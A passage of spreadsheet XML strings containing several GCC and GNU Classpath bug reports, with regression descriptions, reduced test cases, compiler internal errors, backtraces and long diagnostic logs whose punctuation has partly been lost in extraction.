    <t>GCC-21210</t>
  </si>
  <si>
    <t>[4.0 Regression] Trouble with __complex__ types default construction</t>
  </si>
  <si>
    <t>The GCC 4.0.0 release does not support the use of the GNU builtin __complex__
anymore in e.g. std::vector. The code below used to compile on GNU
(compatible) compilers prior to GCC 4.0
#include 
typedef float __complex__ fcomplex
std::vector vfc(10)
GCC 4.0.0 produces the following diagnostic:
$ /data/loose/gcc-4.0.0/bin/g++ -v -save-temps -c -Wall -W tVec.cc
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../../src/gcc-4.0.0/configure --prefix=/data/loose/gcc-4.0.0
--enable-threads --enable-__cxa_atexit
Thread model: posix
gcc version 4.0.0
 /data/loose/gcc-4.0.0/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1plus -E -quiet -v
-D_GNU_SOURCE tVec.cc -mtune=pentiumpro -Wall -W -fpch-preprocess -o tVec.ii
ignoring nonexistent directory
/data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../include/c++/4.0.0
 /data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../include/c++/4.0.0/i686-pc-linux-gnu
 /data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../include/c++/4.0.0/backward
 /usr/local/include
 /data/loose/gcc-4.0.0/include
 /data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/include
 /usr/include
End of search list.
 /data/loose/gcc-4.0.0/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1plus
-fpreprocessed tVec.ii -quiet -dumpbase tVec.cc -mtune=pentiumpro -auxbase tVec
-Wall -W -version -o tVec.s
GNU C++ version 4.0.0 (i686-pc-linux-gnu)
        compiled by GNU C version 4.0.0.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
/data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../include/c++/4.0.0/bits/stl_vector.h:
In constructor â€˜std::vector::vector(size_t) [with _Tp = float
__complex__ _Alloc = std::allocator]â€™:
tVec.cc:3:   instantiated from here
/data/loose/gcc-4.0.0/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../include/c++/4.0.0/bits/stl_vector.h:219:
error: invalid cast from type â€˜intâ€™ to type â€˜float __complex__â€™</t>
  </si>
  <si>
    <t>loose</t>
  </si>
  <si>
    <t>GCC-63306</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: Segmentation fault in analyze_functions()</t>
  </si>
  <si>
    <t>markus@x4 tmp % cat context.ii
template 
class A
class B {
  B(const int 
}
B::B(const int &amp; const A &amp;) {}
markus@x4 tmp % g++ -std=c++11 -c context.ii
cc1plus: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is the issue from PR63244 comment 4.</t>
  </si>
  <si>
    <t>GCC-65525</t>
  </si>
  <si>
    <t>[5 Regression] ICE: sorry unimplemented: unexpected AST of kind mem_ref (-std=c++14 ICE: in potential_constant_expression_1 at cp/constexpr.c:4432)</t>
  </si>
  <si>
    <t>// The following code triggers unimplemented ICE when compiled with -std=c++14
// -std=c++11 compiles fine.
// g++ -std=c++14 test.cpp
// Tested with:
//   g++ (GCC) 5.0.0 20150308 (experimental)
//   g++ (GCC) 5.0.0 20150323 (experimental)
struct A
{
    int x
    char y // Actually short and bool (types smaller than int?) trigger this ICE too
    // Also: the problem doesn't occur if you put the smaller type first e.g. char x int y
    A(int x) {} // custom ctor needed for ICE
}
int main()
{
    A a{0} x{1} y{2}
    x = a // OK
    y = a // OK
    x = y = a // ICE: sorry unimplemented: unexpected AST of kind mem_ref
    // internal compiler error: in potential_constant_expression_1 at cp/constexpr.c:4432
    return 0
}
/*
./gcc/bin/g++ -std=c++14    test.cpp   -o test
test.cpp: In function â€˜int main()â€™:
test.cpp:20:13: sorry unimplemented: unexpected AST of kind mem_ref
     x = y = a // ICE: sorry unimplemented: unexpected AST of kind mem_ref
             ^
test.cpp:20:13: internal compiler error: in potential_constant_expression_1 at cp/constexpr.c:4432
0x843238 potential_constant_expression_1
        ../../gcc/cp/constexpr.c:4432
0x842eca potential_constant_expression_1
        ../../gcc/cp/constexpr.c:4049
0x8423e5 potential_constant_expression_1
        ../../gcc/cp/constexpr.c:4379
0x74c3d2 cp_parser_constant_expression
        ../../gcc/cp/parser.c:8672
0x74c0b4 cp_parser_assignment_expression
        ../../gcc/cp/parser.c:8434
0x74e80d cp_parser_expression
        ../../gcc/cp/parser.c:8569
0x74f0f6 cp_parser_expression_statement
        ../../gcc/cp/parser.c:9976
0x73c8b5 cp_parser_statement
        ../../gcc/cp/parser.c:9827
0x73d422 cp_parser_statement_seq_opt
        ../../gcc/cp/parser.c:10099
0x73d57b cp_parser_compound_statement
        ../../gcc/cp/parser.c:10053
0x75233b cp_parser_function_body
        ../../gcc/cp/parser.c:19185
0x75233b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/cp/parser.c:19221
0x75cbaa cp_parser_function_definition_after_declarator
        ../../gcc/cp/parser.c:23464
0x75da23 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/cp/parser.c:23376
0x75da23 cp_parser_init_declarator
        ../../gcc/cp/parser.c:17055
0x75efbc cp_parser_simple_declaration
        ../../gcc/cp/parser.c:11592
0x75f313 cp_parser_block_declaration
        ../../gcc/cp/parser.c:11466
0x767879 cp_parser_declaration
        ../../gcc/cp/parser.c:11363
0x767afa cp_parser_declaration_seq_opt
        ../../gcc/cp/parser.c:11249
0x767e0f cp_parser_translation_unit
        ../../gcc/cp/parser.c:4100
Please submit a full bug report</t>
  </si>
  <si>
    <t>marciso.gcc</t>
  </si>
  <si>
    <t>GCC-36316</t>
  </si>
  <si>
    <t>type mismatch in binary expression caught by verify_gimple</t>
  </si>
  <si>
    <t>The following module definition:
MODULE YOMCAIN
IMPLICIT NONE
SAVE
TYPE distributed_vector
REAL pointer :: local(:)
INTEGER       :: global_lengthlocal_startlocal_endnchnks
END TYPE distributed_vector
INTERFACE ASSIGNMENT (=)
MODULE PROCEDURE assign_dv_dv
END INTERFACE
INTERFACE OPERATOR (*)
MODULE PROCEDURE multiply_dv_dv
END INTERFACE
CONTAINS
SUBROUTINE assign_dv_dv (handle1handle2)
!         copy one distributed_vector to another
TYPE (distributed_vector) INTENT(IN)    :: handle2
TYPE (distributed_vector) INTENT(INOUT) :: handle1
handle1%local(:) = handle2%local(:)
RETURN
END SUBROUTINE assign_dv_dv
FUNCTION multiply_dv_dv (handle1handle2)
!         multiply two distributed_vectors
TYPE (distributed_vector) INTENT(IN) :: handle2
TYPE (distributed_vector) INTENT(IN) :: handle1
REAL DIMENSION(handle1%local_start:handle1%local_end) ::multiply_dv_dv
multiply_dv_dv = handle1%local(:) * handle2%local(:)
RETURN
END FUNCTION multiply_dv_dv
SUBROUTINE CAININAD_SCALE_DISTVEC ()
TYPE (distributed_vector) :: PVAZG
TYPE (distributed_vector) :: ZTEMP
TYPE (distributed_vector) :: SCALP_DV
ZTEMP = PVAZG * SCALP_DV
END SUBROUTINE CAININAD_SCALE_DISTVEC
END MODULE YOMCAIN
draws this error message when compiling with a recent 4.4.0 gfortran:
a.F90: In function 'caininad_scale_distvec':
a.F90:47: error: type mismatch in binary expression
integer(kind=8)
integer(kind=4)
integer(kind=4)
D.1027 = D.1026 - D.1025
a.F90:47: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This 4.3.1 gfortran doesn't have any complaints about this source:
gfortran -v
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure linux gnu
Thread model: posix
gcc version 4.3.1 20080401 (prerelease) (Debian 4.3.0-3)</t>
  </si>
  <si>
    <t>GCC-66813</t>
  </si>
  <si>
    <t>gcc.target/i386/asm-flag-5.c failed with -march=pentium</t>
  </si>
  <si>
    <t>[hjl@gnu-6 gcc]$ ./xgcc -B./ -m32 -S -march=pentium  /export/gnu/src/tools-iamcu/tools/gcc/testsuite/gcc.target/i386/asm-flag-5.c 
/export/gnu/src/tools-iamcu/tools/gcc/testsuite/gcc.target/i386/asm-flag-5.c: In function â€˜f_sâ€™:
/export/gnu/src/tools-iamcu/tools/gcc/testsuite/gcc.target/i386/asm-flag-5.c:7:1: error: unrecognizable insn:
 void f_s(void) { short x asm( : =@ccc(x)) }
 ^
(insn 7 6 5 2 (set (reg:HI 87 [ x ])
        (zero_extend:HI (reg:QI 88))) /export/gnu/src/tools-iamcu/tools/gcc/testsuite/gcc.target/i386/asm-flag-5.c:7 -1
     (nil))
/export/gnu/src/tools-iamcu/tools/gcc/testsuite/gcc.target/i386/asm-flag-5.c:7:1: internal compiler error: in extract_insn at recog.c:2302
0xeac06d _fatal_insn(char const* rtx_def const* char const* int char const*)
	/export/gnu/import/git/sources/gcc/gcc/rtl-error.c:109
0xeac0ae _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/export/gnu/import/git/sources/gcc/gcc/rtl-error.c:117
0xe5deed extract_insn(rtx_insn*)
	/export/gnu/import/git/sources/gcc/gcc/recog.c:2302
0xa54540 instantiate_virtual_regs_in_insn
	/export/gnu/import/git/sources/gcc/gcc/function.c:1581
0xa559b6 instantiate_virtual_regs
	/export/gnu/import/git/sources/gcc/gcc/function.c:1949
0xa55a86 execute
	/export/gnu/import/git/sources/gcc/gcc/function.c:1998
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[hjl@gnu-6 gcc]$</t>
  </si>
  <si>
    <t>GCC-36091</t>
  </si>
  <si>
    <t>false positive in bounds checking with forall</t>
  </si>
  <si>
    <t>Reduced test case from forall_13.f90:
$ cat f1.f90 
  integer :: p(4)
  p = (/3142/)
  forall (i = 1:4) p(5 - p(i)) = p(5 - i)
  if (any (p .ne. (/1234/))) call abort ()
end
$ gfortran -fbounds-check f1.f90 
$ ./a.out
At line 5 of file f1.f90
Fortran runtime error: Array reference out of bounds for array 'p' upper bound of dimension 1 exceeded (4 &gt; 3)
$ gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../../gcc/trunk/configure --prefix=/home/ig25 --enable-maintainer-mode --enable-languages=cfortran
Thread model: posix
gcc version 4.4.0 20080420 (experimental) (GCC)</t>
  </si>
  <si>
    <t>CLASSPATH-23028</t>
  </si>
  <si>
    <t>JNI bug causes assertion failure</t>
  </si>
  <si>
    <t xml:space="preserve">With Classpath 0.16 trying to run a very simple Swing demo under JCVM
I get a JNI assertion failure in a call to GetIntField() because the object
type and the fieldID are not compatible:
   gnu/java/awt/peer/gtk/GdkGraphics@0x85e0308 not instance of gnu/java/awt/peer/gtk/GtkGenericPeer
Here is the relevant stack trace snippet:
#4  0x282d6c1b in abort () from /lib/libc.so.5
#5  0x280ae91d in GetIntField (jenv=0x107ed6a0 obj=0x29795698
    field=0x107527c8) at jni_native.c:82
#6  0x29f99d72 in set_state (env=0x107ed6a0 obj=0x29795698 table=0x10471440
    state=0x109ea4c0) at native_state.c:217
#7  0x29f862d7 in Java_gnu_java_awt_peer_gtk_GdkGraphics_initState__Lgnu_java_awt_peer_gtk_GtkComponentPeer_2 (env=0x107ed6a0 obj=0x29795698 peer=0x2979569c)
    at gnu_java_awt_peer_gtk_GdkGraphics.c:154
#8  0x280d4289 in _jc_dynamic_invoke (func=0x29f86214 jcni=0 nparams=3
    ptypes=0x2979562c 
	 nwords=3 words=0x29795620
    retval=0x107ed628) at arch/i386/arch_functions.c:336
#9  0x280aa802 in _jc_invoke_jni_a (env=0x107ed600 method=0x107f9d60
    func=0x29f86214 obj=0x85e0308 params=0x29795754) at invoke.c:692 </t>
  </si>
  <si>
    <t>GCC-777</t>
  </si>
  <si>
    <t>Unrecognizable insn:</t>
  </si>
  <si>
    <t>g++ 2.96 and 2.97 both crash with the same unknown instruction error.  I am including both a script transcript and a bzip2'd .ii file.
I am running Red Hat 7.0 and I'm having all sorts of problems with my C++ code -- code that used to compile perfectly under 2.95.  Unfortunately I can't even recompile g++ 2.95.2 on my RH 7.0 machine -- there is a type clash in the libio library.
I hope that this isn't a RH 7.0 problem
Thanks
Mark
Mark_Johnson@Brown.edu
--------
Here's a copy of a script taken when I try to compile one of my program files:
Script started on Sun Nov 12 10:12:26 2000
lugha [1] % g++ -c -o backoff.o backoff.cc
backoff.cc: In member function `bool backoff1::unknown(symbol) const':
backoff.cc:43: Unrecognizable insn:
(insn 21 19 23 (set (reg:SI 44)
        (mem/s/u (symbol_ref:SI (_6symbol.undefined)) 0)) -1 (nil)
    (nil))
backoff.cc:43: Internal compiler error in extract_insn at recog.c:2163
   Please submit a full bug report.
   See  for instructions.
lugha [2] % g++ -v
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with:  --enable-shared --enable-languages=c++
gcc version 2.97 20001106 (experimental)
lugha [3] % g++ -v -save-temps -c -o backoff.o backoff.cc
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/specs
Configured with:  --enable-shared --enable-languages=c++
gcc version 2.97 20001106 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cpp0 -lang-c++ -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ backoff.cc backoff.ii
GNU CPP version 2.97 20001106 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/cc1plus -fpreprocessed backoff.ii -lang-c++ -D__GNUG__=2 -v -D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ backoff.cc -quiet -dumpbase backoff.cc -version -o backoff.s
GNU CPP version 2.97 20001106 (experimental) (cpplib) (i386 Linux/ELF)
cc1plus: Output filename specified twice
GNU C++ version 2.97 20001106 (experimental) (i686-pc-linux-gnu) compiled by GNU C version 2.97 20001106 (experimental).
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-3
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/2.97/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
backoff.cc:9: syntax error before '=' token
backoff.cc:10: syntax error before '=' token
backoff.cc:12: syntax error before '&amp;' token
backoff.cc:16: `is' was not declared in this scope
backoff.cc:17: parse error before while
backoff.cc:22: syntax error before '+=' token
backoff.cc:25: syntax error before '.' token
backoff.cc:31: syntax error before '&amp;' token
backoff.cc:44: syntax error before '&amp;' token
backoff.cc:47: conflicting types for `char c'
backoff.cc:16: previous declaration as `int c'
backoff.cc:48: syntax error before '&gt;&gt;' token
backoff.cc:51: syntax error before '.' token
backoff.cc:55: syntax error before '' token
backoff.cc:58: syntax error before '.' token
backoff.cc:61: syntax error before '.' token
backoff.cc:62: syntax error before '&gt;&gt;' token
backoff.cc:63: ISO C++ forbids declaration of `assert' with no type
backoff.cc:65: parse error before return
backoff.cc:68: syntax error before '&amp;' token
backoff.cc:72: parse error before for
backoff.cc:72: `cindex_max' was not declared in this scope
backoff.cc:72: parse error before '' token
backoff.cc:75: ISO C++ forbids declaration of `prefix' with no type
backoff.cc:75: conflicting types for `int prefix'
backoff.cc:70: previous declaration as `char prefix'
backoff.cc:75: `separator' was not declared in this scope
backoff.cc:76: parse error before '}' token
backoff.cc:93: syntax error before '::' token
backoff.cc:97: `masks' was not declared in this scope
backoff.cc:97: `gi' was not declared in this scope
backoff.cc:97: `gs' was not declared in this scope
backoff.cc:98: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:98: initializer list being treated as compound expression
backoff.cc:98: syntax error before if
backoff.cc:105: syntax error before '::' token
backoff.cc:107: `masks' was not declared in this scope
backoff.cc:107: `gi' was not declared in this scope
backoff.cc:107: `gs' was not declared in this scope
backoff.cc:108: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:108: redefinition of `int cforeach'
backoff.cc:98: `int cforeach' previously defined here
backoff.cc:108: initializer list being treated as compound expression
backoff.cc:108: syntax error before if
backoff.cc:114: `cindex_max' was not declared in this scope
backoff.cc:114: parse error before '' token
backoff.cc:117: syntax error before '.' token
backoff.cc:124: syntax error before '&amp;' token
backoff.cc:127: `is' was not declared in this scope
backoff.cc:127: ISO C++ forbids declaration of `assert' with no type
backoff.cc:127: redefinition of `int assert'
backoff.cc:63: `int assert' previously defined here
backoff.cc:128: syntax error before '.' token
backoff.cc:132: syntax error before '&amp;' token
backoff.cc:144: syntax error before '&amp;' token
backoff.cc:147: syntax error before '=' token
backoff.cc:148: `n' was not declared in this scope
backoff.cc:148: request for member `m' in `c' which is of non-aggregate type 
   `char'
backoff.cc:148: ISO C++ forbids declaration of `assert' with no type
backoff.cc:148: redefinition of `int assert'
backoff.cc:127: `int assert' previously defined here
backoff.cc:151: syntax error before '&lt;&lt;' token
backoff.cc:152: `n' was not declared in this scope
backoff.cc:152: parse error before '' token
backoff.cc:156: ISO C++ forbids declaration of `notfirst' with no type
backoff.cc:156: conflicting types for `int notfirst'
backoff.cc:149: previous declaration as `bool notfirst'
backoff.cc:157: syntax error before '&lt;&lt;' token
backoff.cc:176: syntax error before '::' token
backoff.cc:183: syntax error before '.' token
backoff.cc:184: `masks' was not declared in this scope
backoff.cc:184: `i' was not declared in this scope
backoff.cc:184: `ms' was not declared in this scope
backoff.cc:184: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:184: redefinition of `int cforeach'
backoff.cc:108: `int cforeach' previously defined here
backoff.cc:184: initializer list being treated as compound expression
backoff.cc:184: syntax error before '{' token
backoff.cc:186: `i' was not declared in this scope
backoff.cc:186: ISO C++ forbids declaration of `load_submasks' with no type
backoff.cc:187: parse error before '}' token
backoff.cc:194: syntax error before '::' token
backoff.cc:198: syntax error before '=' token
backoff.cc:199: `css' was not declared in this scope
backoff.cc:199: `m' was not declared in this scope
backoff.cc:200: syntax error before '&amp;' token
backoff.cc:201: syntax error before '=' token
backoff.cc:202: syntax error before '=' token
backoff.cc:203: syntax error before '=' token
backoff.cc:204: syntax error before '&amp;' token
backoff.cc:205: `I_C' was not declared in this scope
backoff.cc:205: `bci' was not declared in this scope
backoff.cc:205: `bc' was not declared in this scope
backoff.cc:205: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:205: redefinition of `int cforeach'
backoff.cc:184: `int cforeach' previously defined here
backoff.cc:205: initializer list being treated as compound expression
backoff.cc:205: syntax error before '{' token
backoff.cc:211: `nsubms' was not declared in this scope
backoff.cc:211: parse error before '' token
backoff.cc:218: parse error before '{' token
backoff.cc:223: syntax error before '&amp;' token
backoff.cc:227: syntax error before '&amp;' token
backoff.cc:230: `mask' was not declared in this scope
backoff.cc:230: `Float' was not declared in this scope
backoff.cc:230: syntax error before '' token
backoff.cc:231: `initial_mask' was not declared in this scope
backoff.cc:231: ISO C++ forbids declaration of `mask_prob' with no type
backoff.cc:231: assignment (not initialization) in declaration
backoff.cc:232: syntax error before '::' token
backoff.cc:234: syntax error before '!=' token
backoff.cc:236: syntax error before '=' token
backoff.cc:237: syntax error before '=' token
backoff.cc:238: syntax error before '=' token
backoff.cc:239: syntax error before '::' token
backoff.cc:240: `mbsi' was not declared in this scope
backoff.cc:240: `mask_bin_binnedState' was not declared in this scope
backoff.cc:240: ISO C++ forbids declaration of `assert' with no type
backoff.cc:240: redefinition of `int assert'
backoff.cc:148: `int assert' previously defined here
backoff.cc:241: `I_B' was not declared in this scope
backoff.cc:241: `bsi' was not declared in this scope
backoff.cc:241: `mbsi' was not declared in this scope
backoff.cc:242: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:242: redefinition of `int cforeach'
backoff.cc:205: `int cforeach' previously defined here
backoff.cc:242: initializer list being treated as compound expression
backoff.cc:242: syntax error before '+=' token
backoff.cc:243: `I_B' was not declared in this scope
backoff.cc:243: `bsi' was not declared in this scope
backoff.cc:243: `mbsi' was not declared in this scope
backoff.cc:243: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:243: redefinition of `int cforeach'
backoff.cc:242: `int cforeach' previously defined here
backoff.cc:243: initializer list being treated as compound expression
backoff.cc:243: syntax error before '{' token
backoff.cc:245: syntax error before '+=' token
backoff.cc:246: syntax error before '::' token
backoff.cc:247: `masks' was not declared in this scope
backoff.cc:247: `smi' was not declared in this scope
backoff.cc:247: `mmsi' was not declared in this scope
backoff.cc:248: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:248: redefinition of `int cforeach'
backoff.cc:243: `int cforeach' previously defined here
backoff.cc:248: initializer list being treated as compound expression
backoff.cc:248: syntax error before '[' token
backoff.cc:249: `fi' was not declared in this scope
backoff.cc:249: `bsi' was not declared in this scope
backoff.cc:249: ISO C++ forbids declaration of `assert' with no type
backoff.cc:249: redefinition of `int assert'
backoff.cc:240: `int assert' previously defined here
backoff.cc:250: parse error before '}' token
backoff.cc:251: syntax error before '&lt;&lt;' token
backoff.cc:252: `masks' was not declared in this scope
backoff.cc:252: `smi' was not declared in this scope
backoff.cc:252: `mmsi' was not declared in this scope
backoff.cc:253: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:253: redefinition of `int cforeach'
backoff.cc:248: `int cforeach' previously defined here
backoff.cc:253: initializer list being treated as compound expression
backoff.cc:253: syntax error before '&lt;&lt;' token
backoff.cc:255: syntax error before '&lt;&lt;' token
backoff.cc:261: syntax error before '&amp;' token
backoff.cc:264: `initial_mask' was not declared in this scope
backoff.cc:264: ISO C++ forbids declaration of `mask_prob' with no type
backoff.cc:264: assignment (not initialization) in declaration
backoff.cc:265: `pair' was not declared in this scope
backoff.cc:265: `Float' was not declared in this scope
backoff.cc:265: `mask' was not declared in this scope
backoff.cc:265: syntax error before '&gt;' token
backoff.cc:266: syntax error before '::' token
backoff.cc:268: syntax error before '!=' token
backoff.cc:270: syntax error before '=' token
backoff.cc:271: syntax error before '=' token
backoff.cc:272: syntax error before '=' token
backoff.cc:273: syntax error before '::' token
backoff.cc:274: `mbsi' was not declared in this scope
backoff.cc:274: `mask_bin_binnedState' was not declared in this scope
backoff.cc:274: ISO C++ forbids declaration of `assert' with no type
backoff.cc:274: redefinition of `int assert'
backoff.cc:249: `int assert' previously defined here
backoff.cc:275: `I_B' was not declared in this scope
backoff.cc:275: `bsi' was not declared in this scope
backoff.cc:275: `mbsi' was not declared in this scope
backoff.cc:276: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:276: redefinition of `int cforeach'
backoff.cc:253: `int cforeach' previously defined here
backoff.cc:276: initializer list being treated as compound expression
backoff.cc:276: syntax error before '+=' token
backoff.cc:277: `I_B' was not declared in this scope
backoff.cc:277: `bsi' was not declared in this scope
backoff.cc:277: `mbsi' was not declared in this scope
backoff.cc:277: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:277: redefinition of `int cforeach'
backoff.cc:276: `int cforeach' previously defined here
backoff.cc:277: initializer list being treated as compound expression
backoff.cc:277: syntax error before '{' token
backoff.cc:279: syntax error before '+=' token
backoff.cc:280: syntax error before '::' token
backoff.cc:281: `masks' was not declared in this scope
backoff.cc:281: `smi' was not declared in this scope
backoff.cc:281: `mmsi' was not declared in this scope
backoff.cc:282: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:282: redefinition of `int cforeach'
backoff.cc:277: `int cforeach' previously defined here
backoff.cc:282: initializer list being treated as compound expression
backoff.cc:282: syntax error before '[' token
backoff.cc:283: `fi' was not declared in this scope
backoff.cc:283: `bsi' was not declared in this scope
backoff.cc:283: ISO C++ forbids declaration of `assert' with no type
backoff.cc:283: redefinition of `int assert'
backoff.cc:274: `int assert' previously defined here
backoff.cc:284: parse error before '}' token
backoff.cc:285: syntax error before '.' token
backoff.cc:288: `results' was not declared in this scope
backoff.cc:288: `results' was not declared in this scope
backoff.cc:288: ISO C++ forbids declaration of `sort' with no type
backoff.cc:288: initializer list being treated as compound expression
backoff.cc:289: parse error before for
backoff.cc:289: syntax error before '&gt;=' token
backoff.cc:296: syntax error before '&amp;' token
backoff.cc:300: `I_B' was not declared in this scope
backoff.cc:300: `bsi' was not declared in this scope
backoff.cc:300: `mbsi' was not declared in this scope
backoff.cc:300: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:300: redefinition of `int cforeach'
backoff.cc:282: `int cforeach' previously defined here
backoff.cc:300: initializer list being treated as compound expression
backoff.cc:300: syntax error before '{' token
backoff.cc:305: syntax error before '::' token
backoff.cc:306: `masks' was not declared in this scope
backoff.cc:306: `smi' was not declared in this scope
backoff.cc:306: `mask_submasks' was not declared in this scope
backoff.cc:306: `m' was not declared in this scope
backoff.cc:306: `afind' was not declared in this scope
backoff.cc:307: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:307: redefinition of `int cforeach'
backoff.cc:300: `int cforeach' previously defined here
backoff.cc:307: initializer list being treated as compound expression
backoff.cc:307: syntax error before '&lt;&lt;' token
backoff.cc:308: `fi' was not declared in this scope
backoff.cc:308: `bsi' was not declared in this scope
backoff.cc:308: ISO C++ forbids declaration of `assert' with no type
backoff.cc:308: redefinition of `int assert'
backoff.cc:283: `int assert' previously defined here
backoff.cc:309: syntax error before '&lt;&lt;' token
backoff.cc:316: syntax error before '::' token
backoff.cc:328: `M_Ms' was not declared in this scope
backoff.cc:328: `mmsi' was not declared in this scope
backoff.cc:328: `mask_submasks' was not declared in this scope
backoff.cc:329: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:329: redefinition of `int cforeach'
backoff.cc:307: `int cforeach' previously defined here
backoff.cc:329: initializer list being treated as compound expression
backoff.cc:329: syntax error before if
backoff.cc:332: `data' was not declared in this scope
backoff.cc:332: `ti' was not declared in this scope
backoff.cc:332: `train' was not declared in this scope
backoff.cc:332: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:332: redefinition of `int cforeach'
backoff.cc:329: `int cforeach' previously defined here
backoff.cc:332: initializer list being treated as compound expression
backoff.cc:332: syntax error before '{' token
backoff.cc:334: `masks' was not declared in this scope
backoff.cc:334: `mi' was not declared in this scope
backoff.cc:334: `consistent_masks' was not declared in this scope
backoff.cc:334: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:334: redefinition of `int cforeach'
backoff.cc:332: `int cforeach' previously defined here
backoff.cc:334: initializer list being treated as compound expression
backoff.cc:334: syntax error before '{' token
backoff.cc:336: `ct' was not declared in this scope
backoff.cc:336: syntax error before '+=' token
backoff.cc:337: `ct' was not declared in this scope
backoff.cc:337: `setYindex' was not declared in this scope
backoff.cc:337: syntax error before '+=' token
backoff.cc:338: syntax error before '.' token
backoff.cc:345: syntax error before '' token
backoff.cc:346: syntax error before '=' token
backoff.cc:348: `data' was not declared in this scope
backoff.cc:348: `hi' was not declared in this scope
backoff.cc:348: `heldout' was not declared in this scope
backoff.cc:348: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:348: redefinition of `int cforeach'
backoff.cc:334: `int cforeach' previously defined here
backoff.cc:348: initializer list being treated as compound expression
backoff.cc:348: syntax error before '{' token
backoff.cc:350: syntax error before '+=' token
backoff.cc:351: `M_Ms' was not declared in this scope
backoff.cc:351: `mi' was not declared in this scope
backoff.cc:351: `mask_submasks' was not declared in this scope
backoff.cc:352: ISO C++ forbids declaration of `cforeach' with no type
backoff.cc:352: redefinition of `int cforeach'
backoff.cc:348: `int cforeach' previously defined here
backoff.cc:352: initializer list being treated as compound expression
backoff.cc:352: syntax error before '[' token
backoff.cc:355: `mask_bin_count' was not declared in this scope
backoff.cc:355: `mask_bin_binnedState' was not declared in this scope
backoff.cc:355: ISO C++ forbids declaration of `initialize_M_I_B' with no type
backoff.cc:355: initializer list being treated as compound expression
backoff.cc:357: syntax error before '=' token
backoff.cc:358: syntax error before '=' token
backoff.cc:359: syntax error before '=' token
backoff.cc:364: ISO C++ forbids declaration of `cross_entropy' with no type
backoff.cc:364: `mask_bin_count' was not declared in this scope
backoff.cc:364: `heldout_count' was not declared in this scope
backoff.cc:364: `em_iterate' was not declared in this scope
backoff.cc:365: parse error before '}' token
backoff.cc:369: `cerr' was not declared in this scope
backoff.cc:369: `mask_bin_count' was not declared in this scope
backoff.cc:369: ISO C++ forbids declaration of `write_em_parameters' with no 
   type
backoff.cc:369: initializer list being treated as compound expression
backoff.cc:370: parse error before '}' token
backoff.cc:374: `cerr' was not declared in this scope
backoff.cc:374: `mask_bin_count' was not declared in this scope
backoff.cc:374: ISO C++ forbids declaration of `write_gviz' with no type
backoff.cc:374: initializer list being treated as compound expression
backoff.cc:375: parse error before '}' token
backoff.cc:379: `cerr' was not declared in this scope
backoff.cc:379: `mask_bin_count' was not declared in this scope
backoff.cc:379: ISO C++ forbids declaration of `write_emissions' with no type
backoff.cc:379: initializer list being treated as compound expression
backoff.cc:380: syntax error before '&lt;&lt;' token
backoff.cc:387: syntax error before '::' token
backoff.cc:391: syntax error before '' token
